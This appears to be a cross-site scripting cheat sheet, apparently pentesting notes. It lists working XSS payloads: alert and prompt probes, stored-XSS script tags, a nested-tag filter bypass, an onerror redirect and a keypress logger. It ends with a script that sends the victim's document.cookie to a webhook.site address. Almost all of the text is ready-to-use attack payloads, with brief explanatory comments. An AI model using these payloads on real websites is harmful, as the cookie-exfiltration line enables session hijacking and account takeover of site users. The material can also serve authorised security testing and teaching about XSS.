XSS

TRY DOUBLE ENCODING THE PAYLOAD (URL ENCODING, BASE64, ETC.)

alert(1)

print()

prompt("hello")
# Every key you press is logged to the browser console
/**
 * Keyboard event handler: writes the name of the pressed key to the console.
 * The only output is console.log; nothing is stored or sent anywhere.
 *
 * @param {KeyboardEvent} event - the event object passed in by the listener
 */
function logKey(event) {
  const { key } = event;
  console.log(key);
}

// Register logKey so it runs on every keydown event fired on the document.
document.addEventListener("keydown",logKey)
# Test for HTML injection
# See if it is stored XSS (i.e. the markup is saved and rendered again on later page loads)
<h1>test</h1>
# Stored XSS
<script>prompt(1)</script>

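# A filter that strips <script> only once removes the inner <script> tag
# The leftover pieces then join into a working <script> tag and the XSS payload executes
# Also check whether the filter removes the script tag recursively
# (stripping tags is not a reliable fix either way; encode output for the context it is written into)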
<scri<script>pt>prompt(1)</scri</script>pt>
# Stored XSS: displays the cookies that scripts can read (HttpOnly cookies do not appear in document.cookie)
<script>alert(document.cookie)</script>
# It will redirect to google.com
<img src=x onerror="window.location.href='https://google.com'">

# If the prompt dialog appears,
# script execution is confirmed (XSS)
<img src=x onerror=prompt()>
<script>var i = new Image; i.src="https://webhook.site/b5ffbf17-8bfe-4b0f-8361-2d5d4ed67a83/?"+ document.cookie;</script>
